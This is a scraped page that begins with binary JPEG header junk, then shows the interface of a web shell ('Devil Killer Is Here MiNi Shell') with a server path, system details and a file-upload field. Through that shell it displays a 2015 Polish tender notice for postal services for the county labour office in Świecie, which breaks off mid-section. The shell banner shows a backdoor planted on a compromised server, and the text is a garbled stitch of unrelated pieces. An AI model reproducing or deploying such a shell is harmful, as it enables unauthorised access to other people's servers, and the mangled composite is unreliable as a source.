JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151210/337378-N-2015.html

<p class="kh_header"><b>Świecie: Świadczenie usług pocztowych na rzecz Powiatowego Urzędu Pracy w Świeciu</b><br>
<b>Numer ogłoszenia: 337378 - 2015; data zamieszczenia: 10.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Świecki - Powiatowy Urząd Pracy w Świeciu , ul. Wojska Polskiego 195a, 86-100 Świecie, woj. kujawsko-pomorskie, tel. 52 33 32 210, faks 52 33 32 253.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pup.swiecie.lo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pocztowych na rzecz Powiatowego Urzędu Pracy w Świeciu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.   Przedmiot zamówienia
3.1. Przedmiotem zamówienia jest świadczenie usług pocztowych na rzecz Powiatowego Urzędu Pracy w Świeciu przez wykonawcę - operatora pocztowego w zakresie przyjmowania, sortowania, przemieszczania oraz doręczania przesyłek pocztowych w obrocie krajowym i zagranicznym, dostarczania zwrotnego potwierdzenia odbioru (ZPO) oraz ewentualnych zwrotów przesyłek niedoręczonych po wyczerpaniu wszystkich możliwości ich doręczenia lub wydania odbiorcy,  zgodnie z przepisami ustawy z dnia 23 listopada 2012r. Prawo pocztowe (Dz. U. z 2012r., poz. 1529) oraz aktów wykonawczych wydanych na jej podstawie. 
3.2	 Zamówienie należy zrealizować w terminie od dnia podpisania umowy, jednak nie wcześniej niż od 01.01.2016 r. do 31.12.2016 r. lub do momentu maksymalnego wykorzystania wartości umowy brutto ustalonej na podstawie złożonej przez wykonawcę oferty.
3.3	Przez wykonawcę - operatora pocztowego rozumie się przedsiębiorcę uprawnionego do wykonywania działalności pocztowej na podstawie wpisu do rejestru operatorów pocztowych prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej. 
3.4	Przez przesyłki pocztowe będące przedmiotem zamówienia rozumie się: 
1)	przesyłki listowe o wadze do 2000 g (Gabaryt A i B):
a)	zwykłe - przesyłka nierejestrowana nie będąca przesyłką najszybszej kategorii,
b)	zwykłe priorytetowe - przesyłka nierejestrowana najszybszej kategorii,
c)	polecone - przesyłka rejestrowana, przemieszczana i doręczana w sposób zabezpieczający ją przed utratą, ubytkiem zawartości lub uszkodzeniem,
d)	polecone priorytetowe - przesyłka rejestrowana najszybszej kategorii, przemieszczana i doręczana w sposób zabezpieczający ją przed utratą, ubytkiem zawartości lub uszkodzeniem,
e)	polecone ze zwrotnym poświadczeniem odbioru (ZPO) - przesyłka rejestrowana, przyjęta za potwierdzeniem nadania i doręczona za pokwitowaniem odbioru,
f)	polecone priorytetowe ze zwrotnym poświadczeniem odbioru (ZPO) - przesyłka rejestrowana najszybszej kategorii, przyjęta za potwierdzeniem nadania i doręczona za pokwitowaniem odbioru.

Gabaryt A - to przesyłki o wymiarach: 
-	Minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm. 
-	Maksimum - żaden z wymiarów nie może przekroczyć wysokości 20 mm, długość 325 mm, szerokości 230 mm.
Gabaryt B - to przesyłki o wymiarach: 
-	Minimum - jeśli choć jeden z wymiarów przekracza wysokość 20 mm lub długość 325 mm lub szerokość 230 mm. 
-	Maksimum - suma długości, szerokości i wysokości nie może być większa niż 900 mm, przy czym największy z tych wymiarów (długość) nie może przekroczyć 600 mm.
Wszystkie wymiary przyjmuje się z tolerancją+/- 2 mm. 

2)	paczki pocztowe o wadze do 10 kg (Gabaryt A i B) w obrocie krajowym
a)	zwykłe - paczki rejestrowane nie będące paczkami najszybszej kategorii,
b)	priorytetowe - paczki rejestrowane najszybszej kategorii,
c)	ze zwrotnym poświadczeniem odbioru - paczki rejestrowane zwykłe i priorytetowe przyjęte za potwierdzeniem nadania i doręczone za pokwitowaniem odbioru.

Gabaryt A - to paczki o wymiarach:
-	Minimum: wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm.
-	Maksimum: żaden z wymiarów nie może przekroczyć długości 600 mm, szerokość 500 mm, wysokość 300 mm.
Gabaryt B - to paczki o wymiarach:
-	Minimum: jeśli choć jeden z wymiarów przekracza długość 600 mm, szerokość 500 mm, wysokość 300 mm.
-	Maksimum: suma długości i największego obwodu mierzonego w innym kierunku niż długość - 3000 mm, przy czym największy wymiar nie może przekroczyć 1500 mm.
Wszystkie wymiary przyjmuje się z tolerancją+/- 2 mm.


3.5. Przez zwroty rozumie się zwroty niedoręczonych przesyłek pocztowych po wyczerpaniu możliwości ich doręczenia lub wydania odbiorcy, z podaniem przyczyny niedoręczenia. Przez ZPO (zwrotne potwierdzenie odbioru) rozumie się zwrot pokwitowanego przez adresata potwierdzenia odbioru.
3.6  Usługa dostarczenia przesyłek pocztowych świadczona będzie przez Wykonawcę do każdego wskazanego przez Zamawiającego adresu na terenie RP i poza granicami RP.
3.7. Przez biuro podawcze Zamawiającego rozumie się Sekretariat Powiatowego Urzędu Pracy w  Świeciu ul. Wojska Polskiego 195 a, 86-100 Świecie,  zlokalizowany  w siedzibie Zamawiającego lub siedzibę Stanowiska Zamiejscowego w Nowem Pl. Św. Rocha 5, 86-170 Nowe.

3.8.	Wykonawca zobowiązany będzie świadczyć usługi pocztowe będące przedmiotem zamówienia na rzecz zamawiającego zgodnie z przepisami:

1)	ustawy z dnia 23 listopada 2012 r. Prawo pocztowe, (Dz. U. z 2012 , poz. 1529) oraz aktów wykonawczych wydanych na jej podstawie,
2)	ustawy z dnia 14 czerwca 1960 r. Kodeks postępowania administracyjnego (teks jedn. Dz. U. z 2013r., poz. 267),
3)	ustawy kodeks postępowania cywilnego (Dz. U. z 2014 r. poz. 101 z późniejszymi zmianami)
4)	innych aktów prawa związanych z realizacją usług będących przedmiotem zamówienia, wydanych na podstawie ustaw i rozporządzeń,
5)	zasad i przepisów regulujących świadczenie usług pocztowych zawartych w regulaminach wykonawcy, a wydanych na podstawie ustawy prawo Pocztowe i innych aktów prawnych związanych z realizacją usług będących przedmiotem zamówienia
6)	międzynarodowych przepisów pocztowych.

3.9. Zamawiający jest odpowiedzialny za nadawanie przesyłek pocztowych (przesyłek listowych i paczek pocztowych) w stanie umożliwiającym wykonawcy doręczenie bez ubytku i uszkodzenia do miejsca zgodnie z adresem przeznaczenia. 
3.10. Zamawiający zobowiązuje się do właściwego przygotowania przesyłek pocztowych do nadania oraz sporządzania zestawień dla przesyłek nierejestrowanych i rejestrowanych.
3.11. Zamawiający zobowiązuje się do nadawania przesyłek w stanie uporządkowanym, przez co należy rozumieć:
a)	dla przesyłek rejestrowanych - wpisanie każdej przesyłki do książki nadawczej w dwóch egzemplarzach, z których oryginał będzie przeznaczony dla wykonawcy w celach rozliczeniowych, a kopia stanowić będzie dla zamawiającego potwierdzenie nadania danej partii przesyłek,
b)	dla przesyłek zwykłych - nierejestrowanych - zestawienie ilościowo-wartościowe przesyłek wg poszczególnych kategorii wagowych sporządzone dla celów rozliczeniowych w dwóch egzemplarzach, z których oryginał będzie przeznaczony dla wykonawcy w celach rozliczeniowych, a kopia stanowić będzie dla zamawiającego potwierdzenie nadania danej partii przesyłek.

3.12.Zamawiający będzie korzystał ze swojego opakowania przesyłek pocztowych, i nie dopuszcza możliwości przepakowania przesyłek przez wykonawcę. Zamawiający wymaga aby na dowodzie nadania przesyłki figurował zamawiający jako podmiot nadający przesyłkę. Opakowanie paczki powinno stanowić zabezpieczenie przed dostępem do zawartości oraz uniemożliwiać uszkodzenie przesyłki w czasie przemieszczania. W przypadku uszkodzenia przesyłki pocztowej przez Wykonawcę ma on obowiązek zabezpieczyć przesyłkę, a w przypadku znacznych uszkodzeń przesyłki rejestrowanej - sporządzić protokolarny opis jej stanu, bez wglądu w jej zawartość, chyba że w wyniku uszkodzenia przesyłki rejestrowanej może wystąpić dalsze uszkodzenie lub ubytek jej  zawartości.
3.13.Zamawiający będzie umieszczał na przesyłkach pocztowych w sposób trwały i czytelny informacje jednoznacznie identyfikujące adresata i nadawcę, jednocześnie określając rodzaj przesyłki na stronie adresowej przesyłki.
3.14.Zamawiający będzie umieszczał na stronie adresowej przesyłek oznaczenie potwierdzające wniesienie opłaty za usługę w postaci napisu, nadruku lub odcisku pieczęci o treści podanej przez wykonawcę.
3.15.Jeśli przesyłki listowe oraz paczki pocztowe wymagać będą specjalnego, odrębnego znakowania lub opakowania właściwego dla danego wykonawcy - wykonawca dostarczy we własnym zakresie i na własny koszt wszelkie materiały niezbędne do tego celu do biura podawczego Zamawiającego.
3.16.Miejscem nadania przesyłek pocztowych (wraz ze stosowną dokumentacją potwierdzającą ich ilość i rodzaj) będzie wskazana przez wykonawcę, placówka nadawcza wykonawcy usytuowana najbliżej siedziby zamawiającego na terenie miasta Świecia i Nowego, czynna codziennie w dni robocze, od poniedziałku do piątku, w godzinach co najmniej  od 8:00 do 16:00. 

3.17.Zamawiający zobowiązuje się dostarczać przesyłki pocztowe do placówki nadawczej wykonawcy, usytuowane najbliżej  siedziby Zamawiającego nadawczej raz dziennie, w dni robocze, od poniedziałku do piątku w godzinach pomiędzy 14:00 a 15:30.

3.18.W przypadku, gdy wykonawca nie ma placówki nadawczej na terenie miasta Świecia lub Nowego, przesyłki pocztowe przygotowane do wysłania będą odbierane przez wykonawcę bezpłatnie z biura podawczego zamawiającego do placówki nadawczej raz dziennie, w dni robocze, od poniedziałku do piątku w godzinach pomiędzy 14:00 a 15:00. Odbioru przesyłek wychodzących dokonywać będzie upoważniony przedstawiciel wykonawcy po okazaniu stosownego upoważnienia.

3.19.Nadanie przesyłek objętych przedmiotem zamówienia następować będzie w dniu ich przekazania wykonawcy przez Zamawiającego.

3.20.Odbiór przesyłek pocztowych przygotowanych do wysyłki będzie każdorazowo dokumentowany przez przedstawiciela Wykonawcy pieczęcią, podpisem i datą w pocztowej książce nadawczej lub w innym równoważnym dokumencie (dla przesyłek rejestrowanych) oraz na zestawieniu ilościowo-wartościowym przesyłek wg poszczególnych kategorii wagowych (dla przesyłek zwykłych - nierejestrowanych).

3.21.W przypadku zastrzeżeń dotyczących odebranych przesyłek pocztowych (nieprawidłowe opakowanie, brak pełnego adresu, niezgodność wpisów do dokumentów nadawczych z wpisami na przesyłkach, brak znaków opłaty), Wykonawca wyjaśnia je ze wskazanym pracownikiem Zamawiającego telefonicznie. Przy braku możliwości ich wyjaśnienia ze wskazanym pracownikiem Zamawiającego lub ich usunięcia w dniu ich odbioru, nadanie odebranych przesyłek nastąpi w następnym dniu roboczym.

3.22.Wszelkie oznaczenia przesyłek poleconych i priorytetowych muszą być zapewnione przez wykonawcę.

3.23.Wykonawca będzie doręczał do biura podawczego Zamawiającego przesyłki pocztowe oraz ZPO (zwrotne potwierdzenie odbioru) i zwroty, raz dziennie, w dni robocze, od poniedziałku do piątku w godzinach pomiędzy 08:00 a 11:00.
Zwrot niedoręczonych przesyłek pocztowych do Zamawiającego odbywać się będzie niezwłocznie po wyczerpaniu możliwości ich doręczenia, z podaniem przyczyny niedoręczenia. Wykonawca jest zobowiązany codziennie przekazywać Zamawiającemu informację o ilości zwrotów (w przypadku ich wystąpienia).
Wykonawca jest zobowiązany do doręczenia Zamawiającemu pokwitowane przez adresata zwrotne potwierdzenie odbioru, niezwłocznie po dokonaniu doręczenia przesyłki adresatowi.


3.24.W przypadku nieobecności adresata przesyłki rejestrowanej, wykonawca  pozostawi zawiadomienie  o próbie dostarczenia przesyłki (awizo) ze wskazaniem gdzie i kiedy adresat może odebrać przesyłkę w terminie 7 kolejnych dni, licząc od dnia następnego po dniu zostawienia  zawiadomienia (awizo); jeżeli adresat nie zgłosił się po odbiór przesyłki w ww. terminie, wykonawca sporządzi powtórne zawiadomienie o możliwości jej odbioru w terminie kolejnych 7 dni, przy czym w przypadku przesyłki nadanej na podstawie kodeksu postępowania administracyjnego i kodeksu postepowania cywilnego przesyłka ta może być odebrana w terminie nie dłuższym niż 14 dni od daty pierwszego zawiadomienia. Po upływie terminu odbioru przesyłka niezwłocznie zwracana jest Zamawiającemu, stosownie do wymogów określonych w SIWZ.

3.25.Zamawiający będzie korzystał z własnych druków zwrotnego potwierdzenia odbioru dla przesyłek krajowych adresowanych do osób fizycznych doręczanych na zasadach określonych w ustawie z dnia 14 czerwca 1960 r. Kodeks postępowania administracyjnego (tekst jednolity Dz. U. z 2013 r.., poz. 267 z późniejszymi zmianami) Zamawiający będzie korzystał z należących do Wykonawcy: druków zwrotnego potwierdzenia odbioru dla pozostałych przesyłek, przesyłek zagranicznych i druków paczka pocztowa. Wykonawca zobowiązany jest do bezpłatnego dostarczania do biura podawczego Zamawiającego, w dni robocze w godzinach pomiędzy 08:00 a 15:00 druku zwrotnego potwierdzenia odbioru dla przesyłek zagranicznych oraz druków paczka pocztowa.

3.26.Wykonawca zobowiązuje się doręczać przesyłki pocztowe krajowe zgodnie z wskaźnikami terminowości określonymi w Rozporządzeniu Ministra Administracji i Cyfryzacji z dnia 29.04.2013r. w sprawie warunków wykonywania usług powszechnych przez operatora wyznaczonego lub regulaminami świadczenia usług pocztowych obowiązujących u Wykonawcy.

3.27.Przesyłki których terminy doręczenia nie zostały określone w niniejszym załączniku, wykonawca zobowiązuje się dostarczać zgodnie z obowiązującymi w tym zakresie przepisami prawa lub regulaminem wykonawcy.


3.28. Nadanie przesyłki przez zamawiającego musi gwarantować w dniu odebrania jej przez Wykonawcę, osiągnięcie skutku:
a) zachowania terminów, stosownie  do wymogów   wynikających z:
- art.12 § 6 pkt 2 ustawy z dnia  29 sierpnia 1997 r. Ordynacja Podatkowa  ( Dz. U z 2015r. poz. 613 z poźn. zm.), 
- art. 57 §5 pkt 2  ustawy z dnia 14 czerwca 1960 r. Kodeks postępowania administracyjnego (t. j. Dz. U. z 2013r. poz.267 z poźn. zm.), 
- art. 124  ustawy z dnia 4 sierpnia 1997 r. Kodeks postępowania karnego ( Dz. U. nr 89  poz. 555 z późn. zm.)
b) wniesienie pisma do sądu o którym mowa w:
- art. 165 § 2  ustawy z dnia 17 listopada 1964r. Kodeks postępowania cywilnego  ( Dz. U  z 2014r. poz.101 z poźn. zm.);
- art. 83  § 3 ustawy z dnia 30 sierpnia 2002r. Prawo  o postępowaniu  przed sądami  administracyjnymi ( Dz. U z 2012r.  poz. 270 z późn. zm.). 

3.29.Zamawiający wymaga, aby na przesyłkach przeznaczonych do nadania oraz na dokumentach nadawczych pozostały napisy, nadruki identyfikujące jednoznacznie Zamawiającego jako nadawcę. 

3.30.Zamawiający nie dopuszcza możliwości sporządzenia odrębnego wykazu ww. przesyłek wymagających nadania u operatora wyznaczonego lub ich oznakowania w określony sposób - w celu wydzielenia i nadania przez wykonawcę u operatora wyznaczonego.

3.31.Zamawiający określił w formularzu ofertowym przewidywane ilości nadawanych przesyłek pocztowych przez okres obowiązywania umowy podpisanej z wybranym Wykonawcą. Rodzaje i liczba przesyłek są szacunkowe i mogą ulec zmianie w zależności od potrzeb Zamawiającego, na co Wykonawca wyraża zgodę tym samym oświadczając, że nie będzie dochodził roszczeń z tytułu zmian rodzajowych i liczbowych w trakcie realizacji umowy. Faktyczne ilości realizowanych przesyłek w okresie obowiązywania umowy będą wynikać z aktualnych potrzeb Zamawiającego, a więc mogą odbiegać od ilości wskazanych w formularzu ofertowym.
Wykazane w formularzu ofertowym przewidywane ilości przesyłek każdego rodzaju, mają charakter szacunkowy, stanowią element służący do kalkulacji ceny oferty oraz wyboru najkorzystniejszej oferty i nie stanowią ze strony zamawiającego zobowiązania do nadawania przesyłek w podanych w tym załączniku ilościach.
Wykonawcy nie będzie przysługiwało jakiekolwiek roszczenie z tytułu nie nadania przez zamawiającego przewidywanej ilości przesyłek pocztowych z zastrzeżeniem, że zmiany ilości nie mogą skutkować zwiększeniem ogólnej kwoty wynagrodzenia ustalonej w ofercie wykonawcy.


3.32.Za okres rozliczeniowy przyjmuje się jeden miesiąc kalendarzowy. Podstawą obliczenia należności będzie suma opłat za przesyłki faktycznie nadane lub zwrócone z powodu braku możliwości ich doręczenia w okresie rozliczeniowym, potwierdzoną co do ilości i wagi na podstawie dokumentów nadawczych oraz dokumentów oddawczych dokumentujących zwrot przesyłek, kiedy możliwość dostarczenia została wyczerpana. 
Opłata za niewykonane usługi komplementarne (tj. potwierdzenie odbioru przesyłki rejestrowanej) wniesiona przy nadawaniu przesyłek podlega zwrotowi. Zwrot ten dokonywany będzie poprzez pomniejszenie kwoty opłat za zwrócone przesyłki. Różnica kwot za zwrot przesyłek oraz opłat należnych z tytułu niewykonania usług komplementarnych stanowić będzie należność dla Wykonawcy.

3.33.W przypadku nadania przez zamawiającego przesyłek nieujętych w złożonym przez wykonawcę formularzu rzeczowo-cenowym podstawą rozliczeń będą ceny z obowiązującego w dniu nadania przesyłek aktualnego cennika usług wykonawcy, który będzie stanowić załącznik do umowy.

3.34.Reklamację z tytułu niewykonania usługi Zamawiający może zgłosić do Wykonawcy po upływie 14 dni od nadania przesyłki rejestrowanej, nie później jednak niż w terminie 12 miesięcy od dnia ich nadania. Termin udzielenia odpowiedzi na reklamacje nie może przekroczyć 30 dni od dnia otrzymania reklamacji.

3.35.Z tytułu niewykonania lub nienależytego wykonania usługi, stanowiącej przedmiot zamówienia Zamawiającemu przysługuje odszkodowanie, zgodnie z zasadami określonymi w ustawie z dnia 23 listopada 2012 r. Prawo pocztowe (dz. U. z 2012r. poz. 1529).

3.36.Ceny jednostkowe brutto podane przez wykonawcę w formularzu rzeczowo-cenowym nie będą podlegały zmianom przez okres realizacji zamówienia, z wyjątkami:
1)	w przypadku zmiany stawki podatku VAT na usługi pocztowe może nastąpić zmiana cen jednostkowych odpowiednio o stawkę podatku VAT,
2)	zmiany cennika na usługi pocztowe, zatwierdzonego przez Prezesa Urzędu Komunikacji Elektronicznej lub w sposób dopuszczony przez obowiązujące przepisy prawa pocztowego
3)	w przypadku, jeśli konieczność wprowadzenia zmian umowy wynika z uregulowań prawnych w zakresie ustalania lub zatwierdzania cen za powszechne usługi pocztowe w rozumieniu ustawy Prawo Pocztowe, a także w przypadku, kiedy ich wprowadzenie wynika z okoliczności powodujących, iż zmiana ww. cen leży w interesie publicznym,
4)	ceny określone przez wykonawcę w ofercie ulegną obniżeniu w toku realizacji zamówienia w przypadku, gdy opłaty pocztowe wynikające ze standardowego cennika lub regulaminu wykonawcy będą niższe od cen wynikających w przedłożonej ofercie. Wykonawca ma obowiązek wówczas stosować względem zamawiającego obniżone opłaty pocztowe dla usług, wynikające ze swojego aktualnego cennika lub regulaminu.

3.37.W przypadku zmian cen jednostkowych brutto  wartość maksymalnego wynagrodzenia za wykonanie przedmiotu zamówienia nie ulegnie zmianie.
3.38.Wnoszenie opłat za świadczenie usług pocztowych zamawiający dokonywać w formie opłaty z dołu za nadane przesyłki pocztowe w obrocie krajowym i zagranicznym i za zwrócone przesyłki z powodu niemożności ich doręczenia. 

3.39.Przez opłatę z dołu należy rozumieć opłatę w całości wniesioną przez zamawiającego bezgotówkowo, poprzez polecenie przelewu w terminie późniejszym niż:
1.	nadanie przesyłek,
2.	odbiór przesyłek rejestrowanych zwracanych do zamawiającego po wyczerpaniu możliwości ich doręczenia / wydania odbiorcy. 

3.40.Na wszystkich przesyłkach krajowych i zagranicznych opłacanych w formie opłaty z dołu zamawiający będzie umieszczać na stronie adresowej przesyłek, w miejscu przeznaczonym na znak opłaty pocztowej nadruk lub odcisk pieczęci uzgodniony z wykonawcą.

3.41.Podstawą obliczenia należności za przesyłki nadane będą ceny jednostkowe brutto przesyłek przedstawione przez wykonawcę w formularzu rzeczowo-cenowym oraz faktyczna ilość przesyłek nadanych w okresie rozliczeniowym, potwierdzona co do ilości i wagi na podstawie dokumentów nadawczych.

3.42.Podstawą obliczenia należności za przesyłki zwrócone z powodu niemożności ich doręczenia będą ceny jednostkowe brutto przesyłek przedstawione przez wykonawcę w formularzu rzeczowo-cenowym  oraz faktyczna ilość przesyłek zwróconych  w okresie rozliczeniowym, potwierdzona co do ilości i wagi na podstawie dokumentów oddawczych wykonawcy.

3.43.W przypadku niezrealizowania usługi potwierdzenia odbioru, opłata za usługę potwierdzenia odbioru będzie zwracana zamawiającemu.

3.44.Wynagrodzenie za przesyłki nadane i przesyłki zwrócone płatne będzie na podstawie faktury VAT, wystawionej w terminie do 7 dni po zakończeniu okresu rozliczeniowego, w terminie 14 dni kalendarzowych liczonym od daty wystawienia faktury, po warunkiem, że doręczenie faktury do biura podawczego zamawiającego nastąpi w ciągu 4 dni roboczych od dnia jej wystawienia. W przeciwnym wypadku termin płatności faktury wynosi 14 dni kalendarzowych licząc od dnia doręczenia zamawiającemu do jego biura podawczego prawidłowo wystawionej faktury.

3.45.W przypadku utraty, ubytku, uszkodzenia przesyłki bądź niewykonania lub nienależytego wykonania przedmiotu zamówienia  wykonawca  zapłaci  zamawiającemu  należne  odszkodowanie,  zgodnie  z przepisami  rozdziału  8  ustawy  dnia  23  listopada  2012  r.  -  Prawo Pocztowe  (Dz.  U.  z  2012  r.  poz. 1529).


3.46.Wykonawca zobowiązany jest do wyznaczenia osoby odpowiedzialnej do kontaktów z zamawiającym do obowiązków której należeć będzie: 

1.	stały kontakt z uprawnionym przedstawicielem zamawiającego,
2.	przyjmowanie wszystkich uwag i zastrzeżeń Zamawiającego dotyczących jakości świadczonych przez Wykonawcą usług..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.11.20.00-4, 64.11.30.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
